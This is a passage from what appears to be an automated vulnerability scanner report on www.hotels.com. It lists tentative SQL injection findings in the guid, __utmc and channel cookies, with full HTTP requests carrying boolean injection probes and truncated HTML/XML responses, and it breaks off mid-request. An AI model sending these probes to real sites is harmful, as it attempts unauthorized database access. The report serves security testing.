s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:46 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d2--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.19. http://www.hotels.com/hotel/details.html [guid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The guid cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the guid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d1--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d2--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 21059860'%20or%201%3d1--%20 and 21059860'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:02 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything h
...[SNIP]...

Request 2

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
